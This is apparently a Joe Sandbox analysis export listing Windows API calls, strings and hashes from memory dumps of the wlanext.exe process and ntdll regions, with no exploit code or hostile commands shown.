                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Unregister$BindingFreeMessageServerTraceVector
                                                                                • String ID:
                                                                                • API String ID: 1810007982-0
                                                                                • Opcode ID: 5ad3befebb8311ce597d16d64eb6829798008f98bf8bf25d7d1231447dc76c1c
                                                                                • Instruction ID: 76ad9c4ced506a2bf2111423a5f1700c8374ca2104b89edb13c31c69f45baa82
                                                                                • Opcode Fuzzy Hash: 5ad3befebb8311ce597d16d64eb6829798008f98bf8bf25d7d1231447dc76c1c
                                                                                • Instruction Fuzzy Hash: 2E21A031200244BFEB2ACF54DC48F9A7F66BB0A744F158098FA154A1F3C3A1CEA5DB54
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00C0A419,00000000,00000000,00C01680,?,00C031A6,?,00C120A0,?,00000002,00000000,00000001,?), ref: 00C1044E
                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C1045E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$FreeProcess
                                                                                • String ID:
                                                                                • API String ID: 3859560861-0
                                                                                • Opcode ID: 3afa19d5137acf72a3d40af1f8190ce1ffa36b4f9705cf807352801adc5aba5a
                                                                                • Instruction ID: 7dc0b82dcea408cb8d4ab38327f6a7d343fbb928613f3aa7290b74c949df69f6
                                                                                • Opcode Fuzzy Hash: 3afa19d5137acf72a3d40af1f8190ce1ffa36b4f9705cf807352801adc5aba5a
                                                                                • Instruction Fuzzy Hash: F0D01271644248AFE7601BA15C08B9B7A9C9B40741FA94015BF09C5050EAB0D5D1E564
                                                                                APIs
                                                                                • RpcBindingFree.RPCRT4(?), ref: 00C0AF56
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: BindingFreeMessageTrace
                                                                                • String ID:
                                                                                • API String ID: 273605667-0
                                                                                • Opcode ID: b37cbedd35ef252be3852a465b3b6452d1ac34b0ee281367a4b6bece19efb48e
                                                                                • Instruction ID: baff4f2a509eb90521b80d2bc0da3c8121f4742b813888301c6be41bb3ed5539
                                                                                • Opcode Fuzzy Hash: b37cbedd35ef252be3852a465b3b6452d1ac34b0ee281367a4b6bece19efb48e
                                                                                • Instruction Fuzzy Hash: AF11C4B12003417FEB2A8F99DC4CF9ABF56AF42758F0941A4FA004A1F2C3A1CD95D756
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00C08F90
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 7fe5098987e6e1164550a9ad0cb7c5272a3f8c8d9fd8319e0538f3277c8c63a2
                                                                                • Instruction ID: 9f718ede54a7e0a940bfa40d96693883559f5eb0f5a79ac9d2edea3736bb2ed2
                                                                                • Opcode Fuzzy Hash: 7fe5098987e6e1164550a9ad0cb7c5272a3f8c8d9fd8319e0538f3277c8c63a2
                                                                                • Instruction Fuzzy Hash: ED9002642511428AE60017F15D0AA09A5D55A58706746D4A16482C4194DE614145D525
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTrace
                                                                                • String ID:
                                                                                • API String ID: 471583391-0
                                                                                • Opcode ID: 2ff54aa0c06d8751c0857ac414117bcfe4e0dd556949789c328295b47112287e
                                                                                • Instruction ID: a3c67b7bc65b084db5678bfe6d30d63649095f62525355f03ad36f89e91897e5
                                                                                • Opcode Fuzzy Hash: 2ff54aa0c06d8751c0857ac414117bcfe4e0dd556949789c328295b47112287e
                                                                                • Instruction Fuzzy Hash: DB21A471640304AFEB16DF98C8C5F99B7A5AF04348F2441A9E9019B2E1D7B1DE44DB54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12500), ref: 00C06193
                                                                                • LeaveCriticalSection.KERNEL32(00C12500), ref: 00C061E3
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00C061EC
                                                                                • GetLastError.KERNEL32 ref: 00C061F9
                                                                                • GetProcAddress.KERNEL32(?,Dot11ExtIhvGetVersionInfo), ref: 00C06242
                                                                                • GetProcAddress.KERNEL32(?,Dot11ExtIhvInitService), ref: 00C0628E
                                                                                • GetLastError.KERNEL32 ref: 00C06297
                                                                                • GetProcAddress.KERNEL32(?,Dot11ExtIhvInitVirtualStation), ref: 00C062D0
                                                                                • memset.MSVCRT ref: 00C0634B
                                                                                • memset.MSVCRT ref: 00C0636E
                                                                                • EnterCriticalSection.KERNEL32(00C12500,00000002,Dot11ExtIhvInitService,00000000,00000000,?,00000058,?), ref: 00C06412
                                                                                  • Part of subcall function 00C0F8F1: TraceMessage.ADVAPI32(?,00000000,0000002B,?,?,?,00000004,00000000,?,00C09358,00C01634,00C01610,0000000A,00C01C50,?,?), ref: 00C0F90C
                                                                                • GetLastError.KERNEL32 ref: 00C0624B
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • FreeLibrary.KERNEL32(?,00000002,Dot11ExtIhvGetVersionInfo,00000000,00000000), ref: 00C064AF
                                                                                • EnterCriticalSection.KERNEL32(00C12500,00000002,Dot11ExtIhvGetVersionInfo,00000000,00000000), ref: 00C064BA
                                                                                • LeaveCriticalSection.KERNEL32(00C12500), ref: 00C064CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AddressEnterErrorLastProc$LeaveLibraryMessageTracememset$FreeLoad
                                                                                • String ID: Dot11ExtIhvGetVersionInfo$Dot11ExtIhvInitService$Dot11ExtIhvInitVirtualStation
                                                                                • API String ID: 564754700-37986322
                                                                                • Opcode ID: 40a3d4fb946d96ebd837052fe59126f26dd347f9e526534a798228f2da71f924
                                                                                • Instruction ID: 7259a05006a026c235662377bfbef2bfa6bdfcf0acb58a0605e6a62ecaff7b2c
                                                                                • Opcode Fuzzy Hash: 40a3d4fb946d96ebd837052fe59126f26dd347f9e526534a798228f2da71f924
                                                                                • Instruction Fuzzy Hash: 99B19F74900214BFEB169FA4DC49F9EBE66AF09754F158061F950A61E2C7B0CFA0EF90
                                                                                APIs
                                                                                Strings
                                                                                • WindowsExcludedProcs, xrefs: 020687C1
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 020687E6
                                                                                • Kernel-MUI-Language-SKU, xrefs: 020689FC
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 02068827
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 02068914
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: _wcspbrk
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 402402107-258546922
                                                                                • Opcode ID: 1cde816ef8367a085f60eabf3ecdcb7f1e86840aef2a73ae5e96df43d07b1a8f
                                                                                • Instruction ID: da0d3a3f1fc5201e1904a41fee55e0822f359ca3ec1373916fd753fa7d392bde
                                                                                • Opcode Fuzzy Hash: 1cde816ef8367a085f60eabf3ecdcb7f1e86840aef2a73ae5e96df43d07b1a8f
                                                                                • Instruction Fuzzy Hash: C7F1C6B2D00309EFDB51DF95C9849EEB7B9FF08304F14846AE905A7610E735AA45EF60
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 2302a776cfa875f60a97acf58f09c1fc482d30feabbf876194b6336edf034918
                                                                                • Instruction ID: d0e23ba202e3dc673c4378a8523f77fc044dc1356db92061a053bf5aa296d967
                                                                                • Opcode Fuzzy Hash: 2302a776cfa875f60a97acf58f09c1fc482d30feabbf876194b6336edf034918
                                                                                • Instruction Fuzzy Hash: 7D6101B1D00755AADF25EF99C8909BFBBF6EF84300B54C03DE4DA4A640D734A642EB60
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(00C0B169,00000001(TokenIntegrityLevel),00000000,00000000,00C0B169,00C01D14,00C12000,00C12000,00C0B169,?,?,00C0B169), ref: 00C0B56E
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B576
                                                                                • GetTokenInformation.ADVAPI32(00C0B169,00000001(TokenIntegrityLevel),?,00C0B169,00C0B169,00C0B169,?,?,?,00C0B169), ref: 00C0B5EB
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B5F1
                                                                                • IsValidSid.ADVAPI32(?,?,?,00C0B169), ref: 00C0B61E
                                                                                • GetLengthSid.ADVAPI32(?,?,?,00C0B169), ref: 00C0B662
                                                                                • CopySid.ADVAPI32(00C0B169,?,?,00000000,?,?,?,00C0B169), ref: 00C0B687
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B691
                                                                                • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00C0B6BB
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • LocalFree.KERNEL32(00000000,00C0B169), ref: 00C0B6FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$InformationToken$ConvertCopyFreeLengthLocalMessageStringTraceValid
                                                                                • String ID:
                                                                                • API String ID: 1907644683-0
                                                                                • Opcode ID: ec65c5679a75cb66afc55f6084384703f8b32b86564932fc4edeae1042375b6d
                                                                                • Instruction ID: 5799265ac8d3849b5e91a7602dad49b4d8a34aaedcadf728830683f0513a0353
                                                                                • Opcode Fuzzy Hash: ec65c5679a75cb66afc55f6084384703f8b32b86564932fc4edeae1042375b6d
                                                                                • Instruction Fuzzy Hash: 1C61283191021AAFDB1ADF95CD48FADBBB6BB05704F244095F510A61E2D7B2CE90EB50
                                                                                APIs
                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02093F12
                                                                                Strings
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02093EC4
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0209E2FB
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02093F4A
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02093F75
                                                                                • Execute=1, xrefs: 02093F5E
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0209E345
                                                                                • ExecuteOptions, xrefs: 02093F04
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: BaseDataModuleQuery
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 3901378454-484625025
                                                                                • Opcode ID: eb8c61ef1bc60293bfec6a23d1131044cf08aeed4122f74fd2c4ffebb62e69b3
                                                                                • Instruction ID: d896cb5eaaa430a3b24c5156a7e6db9a456b4a38ea9601b5483d4c3110f386e1
                                                                                • Opcode Fuzzy Hash: eb8c61ef1bc60293bfec6a23d1131044cf08aeed4122f74fd2c4ffebb62e69b3
                                                                                • Instruction Fuzzy Hash: E141C671A8031C7AEF21DA94DCC9FEEB3BDAF14704F0045A9F506E6090EB709A45AF65
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600,00C01680,00000000,00C120B0), ref: 00C0A9D9
                                                                                • LeaveCriticalSection.KERNEL32(00C12600), ref: 00C0AA10
                                                                                • LeaveCriticalSection.KERNEL32(00C12600), ref: 00C0AA92
                                                                                • ChangeTimerQueueTimer.KERNEL32(00000005,?,7FFFFFFF,00000000), ref: 00C0AAA6
                                                                                • GetLastError.KERNEL32 ref: 00C0AAB6
                                                                                • DeleteTimerQueueTimer.KERNEL32(00000005,?,000000FF), ref: 00C0AB1C
                                                                                • GetLastError.KERNEL32 ref: 00C0AB26
                                                                                • DeleteTimerQueueEx.KERNEL32(00000005,000000FF), ref: 00C0AB5A
                                                                                • GetLastError.KERNEL32 ref: 00C0AB68
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$CriticalErrorLastQueueSection$DeleteLeave$ChangeEnterMessageTrace
                                                                                • String ID:
                                                                                • API String ID: 2363892891-0
                                                                                • Opcode ID: 1c18ca4110f01c10507574629970061fcdd007971ee84ca501e3b1dc0dba4c6a
                                                                                • Instruction ID: 682710ae5e59b602ba5f05eca34452f6a8db84c445b42eef5ff7488a33f2e531
                                                                                • Opcode Fuzzy Hash: 1c18ca4110f01c10507574629970061fcdd007971ee84ca501e3b1dc0dba4c6a
                                                                                • Instruction Fuzzy Hash: 2C51B534640341AFEF1A9F60DD44BAD7FA6BB05708F244158F911661E2C771CA92EF52
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID: .$:$:
                                                                                • API String ID: 3965848254-2308638275
                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction ID: 67de3c3d8d1a02aaccdedbe8416d8a0de3e91dbac82d4f40e72628eeb15c3f83
                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction Fuzzy Hash: 26A1CD7190030AEEDF25EFA4C8547BFBBB6AF04308F24846AD992A7240D730964DEB51
                                                                                APIs
                                                                                • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C03CF3
                                                                                • GetLastError.KERNEL32 ref: 00C03CFD
                                                                                • GetSystemMetrics.USER32 ref: 00C03D37
                                                                                • _wtol.MSVCRT(?), ref: 00C03D7B
                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C03D91
                                                                                • WaitForSingleObject.KERNEL32(0001D4C0), ref: 00C04009
                                                                                  • Part of subcall function 00C041B9: EnterCriticalSection.KERNEL32(00C12520,00C12000,00000000,00C01680,?,00C03EE6,00000000,00C120B0,00000002,00C120A0,00000001), ref: 00C04220
                                                                                  • Part of subcall function 00C041B9: LeaveCriticalSection.KERNEL32(00C12520,?,00C120E8,?,00C03EE6,00000000,00C120B0,00000002,00C120A0,00000001), ref: 00C04250
                                                                                • UuidCreate.RPCRT4(00C120C0), ref: 00C03F1B
                                                                                • GetLastError.KERNEL32 ref: 00C03DA0
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CreateCriticalErrorLastSection$EnterEventHeapInformationLeaveMessageMetricsObjectSingleSystemTraceUuidWait_wtol
                                                                                • String ID:
                                                                                • API String ID: 48018306-0
                                                                                • Opcode ID: 1357c147490f401c979dac551a58b5fc23ae8ae239638cfcaa68b25e74bf7764
                                                                                • Instruction ID: 651de9c2672ca08565e4de0ec4f9122a31cd51056d21d0ed10e72c42edf3caa6
                                                                                • Opcode Fuzzy Hash: 1357c147490f401c979dac551a58b5fc23ae8ae239638cfcaa68b25e74bf7764
                                                                                • Instruction Fuzzy Hash: 76B1F870A447D16EE72A8B559C48FAA7E9EAF06784F0942C4FD109B2F2C391CF90D784
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(00C120DC,00000001), ref: 00C037C2
                                                                                • Sleep.KERNEL32(?,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C0399C
                                                                                • Sleep.KERNEL32(?,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C03A1B
                                                                                • Sleep.KERNEL32(?,00C120B0,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C03AA0
                                                                                  • Part of subcall function 00C05D57: EnterCriticalSection.KERNEL32(00C12500,00C01680,00000000,00C12000,?,?,00C03B26,?,00C120B0,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C05D97
                                                                                  • Part of subcall function 00C05D57: LeaveCriticalSection.KERNEL32(00C12500,?,?,00C03B26,?,00C120B0,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C05E84
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C03B60
                                                                                • GetCurrentProcess.KERNEL32(000002C9), ref: 00C03BA8
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C03BAF
                                                                                • ExitProcess.KERNEL32 ref: 00C03BB6
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                  • Part of subcall function 00C0428C: EnterCriticalSection.KERNEL32(00C12520,00C01680,00000000,00C120A0,?,?,00C03969,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C042CC
                                                                                  • Part of subcall function 00C0428C: LeaveCriticalSection.KERNEL32(00C12520,00C120E8,?,?,00C03969,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C0431D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$ProcessSleep$EnterLeave$CloseCurrentExchangeExitHandleInterlockedMessageTerminateTrace
                                                                                • String ID:
                                                                                • API String ID: 4276794945-0
                                                                                • Opcode ID: 2bd08f81cde2e990157969ef67495fb7c140de11ee29e940fd7e2783eb9a4629
                                                                                • Instruction ID: de1a499e20fbda9793fe6525586a0c95e43651728e135b1692c9a698232f074c
                                                                                • Opcode Fuzzy Hash: 2bd08f81cde2e990157969ef67495fb7c140de11ee29e940fd7e2783eb9a4629
                                                                                • Instruction Fuzzy Hash: EEC1F4706402C06BEB26CF55880CF9A7E9EEB06748F094698F9555F1E2C3A4CF90EB95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600,00C01680,00C12000,00000000,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A797
                                                                                • CreateTimerQueue.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A7D3
                                                                                • GetLastError.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A7E2
                                                                                • CreateTimerQueueTimer.KERNEL32(00C12490,00C0A599,7FFFFFFF,00000064,00000010,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A83F
                                                                                • GetLastError.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A84D
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • DeleteTimerQueueEx.KERNEL32(00000000,000000FF,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A897
                                                                                • GetLastError.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A8A1
                                                                                • LeaveCriticalSection.KERNEL32(00C12600,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A8E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$ErrorLastQueue$CreateCriticalSection$DeleteEnterLeaveMessageTrace
                                                                                • String ID:
                                                                                • API String ID: 1365609285-0
                                                                                • Opcode ID: 7b456b4c6b962de970b721667d498e166daef34564f580a841e3edef5dd0621b
                                                                                • Instruction ID: 1e75d047bbf98f7ef098fd176a3085055d7bcbc6d3c5184d394f2e725a6b22cc
                                                                                • Opcode Fuzzy Hash: 7b456b4c6b962de970b721667d498e166daef34564f580a841e3edef5dd0621b
                                                                                • Instruction Fuzzy Hash: 6561B434640301EFEB2A8F54DD48F8CBB62BB09B08F198265F510571F2C3B1CAA1EB46
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12500,00C01680,00000000,00C12000), ref: 00C065F5
                                                                                • LeaveCriticalSection.KERNEL32(00C12500), ref: 00C06657
                                                                                • CreateThread.KERNEL32(00000000,00000000,00C06526,00000000,00000000,00000000), ref: 00C06675
                                                                                • GetLastError.KERNEL32 ref: 00C06688
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 00C066F4
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • GetLastError.KERNEL32 ref: 00C0670B
                                                                                • LeaveCriticalSection.KERNEL32(00C12500,?), ref: 00C06760
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C06770
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$ErrorLastLeave$CloseCreateEnterHandleMessageObjectSingleThreadTraceWait
                                                                                • String ID:
                                                                                • API String ID: 4034362199-0
                                                                                • Opcode ID: 26615db8b28ba4bce081b4fd5a56893edcd73f754aebde5c0955d3e3e2a3b831
                                                                                • Instruction ID: 7c8f33fe656c03dcf75c8ca5a11faa175485dc74d003e5414cda4d230c777f18
                                                                                • Opcode Fuzzy Hash: 26615db8b28ba4bce081b4fd5a56893edcd73f754aebde5c0955d3e3e2a3b831
                                                                                • Instruction Fuzzy Hash: 91519334900245EFEF158F68DD48BADBFB5BB09308F1580A9EA10A61E1C3B1CBA4DB54
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020A2206
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-4236105082
                                                                                • Opcode ID: 3daf2c5a1438dc2daab8ace32016168340fc878fc95337de205ef6ad0faabb95
                                                                                • Instruction ID: 97d207e1b2f552a6aeaec5e812119bf03d397467f9dcbdb5dbd85e1892a419f0
                                                                                • Opcode Fuzzy Hash: 3daf2c5a1438dc2daab8ace32016168340fc878fc95337de205ef6ad0faabb95
                                                                                • Instruction Fuzzy Hash: 495125717003116FEB55DB58CC90FA673EAAF94720F218279EC55DF285EA21EC41ABA0
                                                                                APIs
                                                                                • GetTickCount64.KERNEL32(?,80000005,?,?), ref: 00C0F2B3
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • GetTickCount64.KERNEL32(?,?), ref: 00C0F313
                                                                                • Sleep.KERNEL32(00000064), ref: 00C0F3CA
                                                                                • ReadFile.KERNEL32(?,?,?,00000000,?), ref: 00C0F46D
                                                                                • GetLastError.KERNEL32 ref: 00C0F47A
                                                                                • InterlockedIncrement.KERNEL32(00C124C4), ref: 00C0F4A0
